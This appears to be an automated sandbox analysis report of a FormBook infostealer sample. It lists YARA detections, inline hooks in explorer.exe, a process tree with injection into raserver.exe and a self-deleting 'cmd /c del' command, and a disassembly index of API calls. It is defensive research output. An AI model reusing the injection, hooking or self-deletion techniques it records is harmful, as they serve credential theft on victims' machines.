                                        Jun 12, 2021 08:59:06.651859045 CEST8380INData Raw: 63 75 72 73 6f 72 3a 68 61 6e 64 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 33 39 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 20 77
                                        Data Ascii: cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width:
                                        Jun 12, 2021 08:59:06.651873112 CEST8381INData Raw: 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e e5 a0 86 e6 a0 88 e8 b7 9f e8 b8 aa 3a 3c
                                        Data Ascii: </tr> </table> <br> <b>:</b> <br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>[NullReferenc
                                        Jun 12, 2021 08:59:06.651887894 CEST8382INData Raw: 70 70 6c 69 63 61 74 69 6f 6e 2e 53 79 6e 63 45 76 65 6e 74 45 78 65 63 75 74 69 6f 6e 53 74 65 70 2e 53 79 73 74 65 6d 2e 57 65 62 2e 48 74 74 70 41 70 70 6c 69 63 61 74 69 6f 6e 2e 49 45 78 65 63 75 74 69 6f 6e 53 74 65 70 2e 45 78 65 63 75 74
                                        Data Ascii: pplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)-->...


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function Name    Hook Type    Active in Processes
                                        PeekMessageA     INLINE       explorer.exe
                                        PeekMessageW     INLINE       explorer.exe
                                        GetMessageW      INLINE       explorer.exe
                                        GetMessageA      INLINE       explorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function Name    Hook Type    New Data
                                        PeekMessageA     INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xE9
                                        PeekMessageW     INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                        GetMessageW      INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                        GetMessageA      INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xE9

                                        Statistics

                                        CPU Usage

                                        Memory Usage

                                        High Level Behavior Distribution

                                        Behavior

                                        System Behavior

                                        General

                                        Start time:08:57:11
                                        Start date:12/06/2021
                                        Path:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\XhU4EXUp0x.exe'
                                        Imagebase:0x340000
                                        File size:907264 bytes
                                        MD5 hash:49C83ECEB8A816B959A778E5F2E78801
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:08:57:15
                                        Start date:12/06/2021
                                        Path:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Imagebase:0xe60000
                                        File size:907264 bytes
                                        MD5 hash:49C83ECEB8A816B959A778E5F2E78801
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:08:57:18
                                        Start date:12/06/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6fee60000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:08:57:38
                                        Start date:12/06/2021
                                        Path:C:\Windows\SysWOW64\raserver.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\raserver.exe
                                        Imagebase:0x1370000
                                        File size:108544 bytes
                                        MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:08:57:42
                                        Start date:12/06/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:08:57:43
                                        Start date:12/06/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 1: $j!}
                                          • API String ID: 0-2991400020
                                          • Opcode ID: 3c5b17b7e4c81c5f844770954b5590da93106289f09ee4fe5cbfb380fe58e224
                                          • Instruction ID: c33ae579b491dc0726d7241189a868cd6d5a4b4627b815c47d6cd6016b13a2b9
                                          • Opcode Fuzzy Hash: 3c5b17b7e4c81c5f844770954b5590da93106289f09ee4fe5cbfb380fe58e224
                                          • Instruction Fuzzy Hash: D4D13B74E0420ACFCB04CFA5D5859AEFBF2FF89301B24D5A9D805A7255D7349A46CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 1: $j!}
                                          • API String ID: 0-2991400020
                                          • Opcode ID: 8af6cb11925a723646313f10cb6388368e4ea4429774d0ff0e8e59df56a7554d
                                          • Instruction ID: c599b0288f1b3c849d03b38d820c7ef41d796c55001a9a741318a5a53d96f2ed
                                          • Opcode Fuzzy Hash: 8af6cb11925a723646313f10cb6388368e4ea4429774d0ff0e8e59df56a7554d
                                          • Instruction Fuzzy Hash: 82D14DB4E0420ACFCB04CFA5D5859AEFBF2FF89301B24D5A9D805AB254D7349A46CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: Z$Z
                                          • API String ID: 0-3829148472
                                          • Opcode ID: 914d65d2e021ad4b889cf656e67bbea3fd3d16900d623898d954bd0324b982e6
                                          • Instruction ID: df5a3bad643832ca843597199f6cee53b1a313dfbddfc2fbe4dca1561b0da8e1
                                          • Opcode Fuzzy Hash: 914d65d2e021ad4b889cf656e67bbea3fd3d16900d623898d954bd0324b982e6
                                          • Instruction Fuzzy Hash: C6815E74D19208DFCB04CFA9D5845ADFBF6FB8A711F10A52AD026B7254D738DA428F24
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: <l
                                          • API String ID: 0-969013996
                                          • Opcode ID: 451adabce9f82ba9d956c41d42cac0e3615acbb4b8e4d3527a08ec6ab9b87b89
                                          • Instruction ID: c34d360c3dbb5b4cfa71e8fab8cb4cfc22a2ece18b8597ee4e648e4484300ad2
                                          • Opcode Fuzzy Hash: 451adabce9f82ba9d956c41d42cac0e3615acbb4b8e4d3527a08ec6ab9b87b89
                                          • Instruction Fuzzy Hash: 22D17074E00209CFCB14DFA8C484AAEFBF2FF48314F15855AE565AB355DB34AA46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 976f769d646f5801fb895803f49056dacf8e6d35377631a14f923e5cff3c6088
                                          • Instruction ID: ca5c4cd22e6ad6609c641064e6e8a4a5f34bd4868e9a86ea0ea7d33a4e5e49b3
                                          • Opcode Fuzzy Hash: 976f769d646f5801fb895803f49056dacf8e6d35377631a14f923e5cff3c6088
                                          • Instruction Fuzzy Hash: 1A32B130B012049FDB15DB69C590BAEB7F6EF89706F1480AAE515DB392CB34EE05CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42fd068006271b3b856dd89791a9a092695f0e6cf75fb49ecf59b6a8cf617315
                                          • Instruction ID: 03eabee9b63f433f5b7e205c5dde8ae431ef3a1659574dbc5a2b2d4f1b6f0ed2
                                          • Opcode Fuzzy Hash: 42fd068006271b3b856dd89791a9a092695f0e6cf75fb49ecf59b6a8cf617315
                                          • Instruction Fuzzy Hash: 30B16E74E002598FDF10CFA9C8857EEBBF2BF88315F14812AD825A7394DB749945CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55487005f484af1b7d936f39c6e23680c7d32e4ff6f7f47f89ccc42b3b266f06
                                          • Instruction ID: e11c563152788ba11a5a86ea5e45ecbd8c7efe34332b9ccceb309c6c59b41ab2
                                          • Opcode Fuzzy Hash: 55487005f484af1b7d936f39c6e23680c7d32e4ff6f7f47f89ccc42b3b266f06
                                          • Instruction Fuzzy Hash: E0B18270E002098FDB10CFA9C9917EEFBF2AF88759F14812AE424EB354DB749945CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c13aeb175c5995802d8071d51708d7a16b14eaebb932cc4edcd94cf6825a7da8
                                          • Instruction ID: 4188bbfbfcb7b69ba1f870bb1332d67c6a4b78b542e1f043d33d1e0102ac61a4
                                          • Opcode Fuzzy Hash: c13aeb175c5995802d8071d51708d7a16b14eaebb932cc4edcd94cf6825a7da8
                                          • Instruction Fuzzy Hash: FB510571D0422ACFDB24CF65D984BEDBBB2BB89301F1495EAC41AA7250E7349AC58F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3069bbb0a42deb75bc81017e0634e930778ad7438eba14969991d59778fbecc
                                          • Instruction ID: 8ff2e168932435f90d7fdb63dfdaf11712afbe4b1df70b5544118cf6b108ea5a
                                          • Opcode Fuzzy Hash: a3069bbb0a42deb75bc81017e0634e930778ad7438eba14969991d59778fbecc
                                          • Instruction Fuzzy Hash: 8F314470D45228DFDB009FA4D599BEEBBF1EF0A302F14546AE422B3381D7789A41CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d27b66a9a94b05a5f0e402d84b73ffefe338d4f5787a21af6651d715b8da9a07
                                          • Instruction ID: 4f876400278e8e788e21a730589595dad425d6df7ce4b96b746425886104d159
                                          • Opcode Fuzzy Hash: d27b66a9a94b05a5f0e402d84b73ffefe338d4f5787a21af6651d715b8da9a07
                                          • Instruction Fuzzy Hash: 61312270D05218DFDB10CFA5D4997EEBBB1EF09302F14542AE422B3281D7785A41CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B5DD8A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 78f848c642be9bbe11bbda82108f3d8046a59e9054da94de0480ac34faf12f10
                                          • Instruction ID: e6bc035183008467688a4d9337016aed7b4f844f9ef73a53e3607459ad65c6ef
                                          • Opcode Fuzzy Hash: 78f848c642be9bbe11bbda82108f3d8046a59e9054da94de0480ac34faf12f10
                                          • Instruction Fuzzy Hash: 5751B0B1D00209AFDB14CF9AC884ADEBBF5FF48314F24826AE819AB250D7749845CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B5DD8A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: eded7631e94057b56c6129a061d45e813e1d5107c38e3cad87264d4695fdeb1c
                                          • Instruction ID: c52e4ed1b8d92c9f683786f930da804c9f9604a75a9e9b7d962fc01d9d867af3
                                          • Opcode Fuzzy Hash: eded7631e94057b56c6129a061d45e813e1d5107c38e3cad87264d4695fdeb1c
                                          • Instruction Fuzzy Hash: F551C0B1D00209DFDB14CF99D980ADEBBB2FF48310F24826AE819AB250D7749945CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNELBASE(?), ref: 0B4E2032
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: fbd5379bd98c0bb9f9af1562aac9b5c3717acb068076c9768cd45fc6b222cc53
                                          • Instruction ID: a2e684aaa52ceb6ceef8f353971a04d64a8059ab1462805cffb9974b71370ede
                                          • Opcode Fuzzy Hash: fbd5379bd98c0bb9f9af1562aac9b5c3717acb068076c9768cd45fc6b222cc53
                                          • Instruction Fuzzy Hash: 4F3148B0D002599FDB14CFA9C4857DEBBB5BB08314F14812AE825AB380D7B89945CFA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNELBASE(?), ref: 0B4E2032
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: b9fa017fd7bc961eddc41149cf8e2da70b1d6313d4d3b4a5e95ab17e866d8be5
                                          • Instruction ID: 6990fc061c62a45e7bfd091407ebf3c8e0775cf8aee1f8e8b9f81ee5f1c56316
                                          • Opcode Fuzzy Hash: b9fa017fd7bc961eddc41149cf8e2da70b1d6313d4d3b4a5e95ab17e866d8be5
                                          • Instruction Fuzzy Hash: E53148B0D00259DFDB14CFA9C48579EBBF5BB08314F14812AE825BB380D7B89945CFA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B56E47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 8d28f836b295f576ec6c041dbcf8403846d3f6eb75085b7ed545517606ffe553
                                          • Instruction ID: 7e147f89846a104d1f764a52710b2d06796c40d49c5e18e81ca1d53263f25c57
                                          • Opcode Fuzzy Hash: 8d28f836b295f576ec6c041dbcf8403846d3f6eb75085b7ed545517606ffe553
                                          • Instruction Fuzzy Hash: F921D2B5901248AFDB10CFAAD584BDEBBF4EB48324F14845AE914A7210D374A955CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B56E47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 0d13de48753f5a9ed061033cb8a3a14445fd069c61eccdac4a68c6bf107cd1b6
                                          • Instruction ID: 5f86abf66899625bff3d9f68a59b06115f45ccfa19e7da3ddec5ccbd3d37a451
                                          • Opcode Fuzzy Hash: 0d13de48753f5a9ed061033cb8a3a14445fd069c61eccdac4a68c6bf107cd1b6
                                          • Instruction Fuzzy Hash: 1321E4B5901248AFDB10CFAAD584BDEBBF8FB48320F14845AE914A3310D374A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B5BE89,00000800,00000000,00000000), ref: 00B5C09A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 933b9918aa2939033217d356047911d115938cad07e6b372168e39e4db5e9f36
                                          • Instruction ID: b774a9d9bd1acbf10f670b38812cc2c546a2093746f492c4108bb95f5d3efdd9
                                          • Opcode Fuzzy Hash: 933b9918aa2939033217d356047911d115938cad07e6b372168e39e4db5e9f36
                                          • Instruction Fuzzy Hash: 551103B6900309DFDB10CF9AD444BDEFBF5EB88324F14846AE915A7240C375A949CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B5BE89,00000800,00000000,00000000), ref: 00B5C09A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: eab27e685f74bbbb5a5af07df4419e4f9da5cea878b06c654a966ca40da83def
                                          • Instruction ID: 427951c768b528ff202cc1ff674bcc472bfa0de3557f816e4910bde85f461d32
                                          • Opcode Fuzzy Hash: eab27e685f74bbbb5a5af07df4419e4f9da5cea878b06c654a966ca40da83def
                                          • Instruction Fuzzy Hash: 1F1130B6800309CFDB10CF9AC484BDEFBF1EB48324F14846AD919A7200C378A949CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B4EAC05
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: cb69903b814714df4dcb68bca1c2e5e0519932a65f3d93053dfbd4c852e5ac8a
                                          • Instruction ID: e0c966ee81e406e94d9a5ab8fede2ce4e1ecea1266646605932b60e3c99a514f
                                          • Opcode Fuzzy Hash: cb69903b814714df4dcb68bca1c2e5e0519932a65f3d93053dfbd4c852e5ac8a
                                          • Instruction Fuzzy Hash: 7B11D6B58002499FDB10CF9AD885BDFFBF8EB88324F14841AE555A7610D374A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B5BE0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: ea1779bfcf2d602df73254cba3abbe1c2db70af5616477d578d40010d72fc3a1
                                          • Instruction ID: e0655564ae41dd0e49abc45efb483d1db2b7d120c8fc944d422f0478c2d5d156
                                          • Opcode Fuzzy Hash: ea1779bfcf2d602df73254cba3abbe1c2db70af5616477d578d40010d72fc3a1
                                          • Instruction Fuzzy Hash: 4611DFB6C006498FDB10CF9AC444BDEFBF5EB88324F14846AD959A7600D378A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0B4EC790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: c19527f4f5bab1294e72d2e3c4b4d05dd18783ff67c18d1a015c4b507d03c23c
                                          • Instruction ID: c9e1d2fba804054351b9c9a1b1b8f6be64d06097fbbcee372f34dafe82c13c96
                                          • Opcode Fuzzy Hash: c19527f4f5bab1294e72d2e3c4b4d05dd18783ff67c18d1a015c4b507d03c23c
                                          • Instruction Fuzzy Hash: 4B1145B58002498FDB10CF9AC484BDEBBF4EF48320F14842AD9A8B7340D738A644CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0B4EC790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 7a19a071174a5303d0c5598f5519febdbd886c309314e2c7fae41df5035388a5
                                          • Instruction ID: 5d3c4472b5491cade3eec9a6e6fde0f08d052307ca87789dfc14b63341f21e0a
                                          • Opcode Fuzzy Hash: 7a19a071174a5303d0c5598f5519febdbd886c309314e2c7fae41df5035388a5
                                          • Instruction Fuzzy Hash: 871122B68002498FDB10CF99C584BDEBBF4EB48324F15842AD5A9B7240D738AA44CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B4EAC05
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 95cc5e3c560ccb1b7a5e144b3f679aa0430457db5dbcffb51907fbad634bd5c6
                                          • Instruction ID: 2d209ab3df7296e0312d8439a17518a0dc482d3debc074b725277bd169e07131
                                          • Opcode Fuzzy Hash: 95cc5e3c560ccb1b7a5e144b3f679aa0430457db5dbcffb51907fbad634bd5c6
                                          • Instruction Fuzzy Hash: 4B11F2B59002499FDB10CF9AC488BDFBBF8EB48324F10841AE965A7610C374A984CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B5BE0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: aa94ef80438b894895b5685cd006a946f3136156e6e92a21b9753d3ae731b6a4
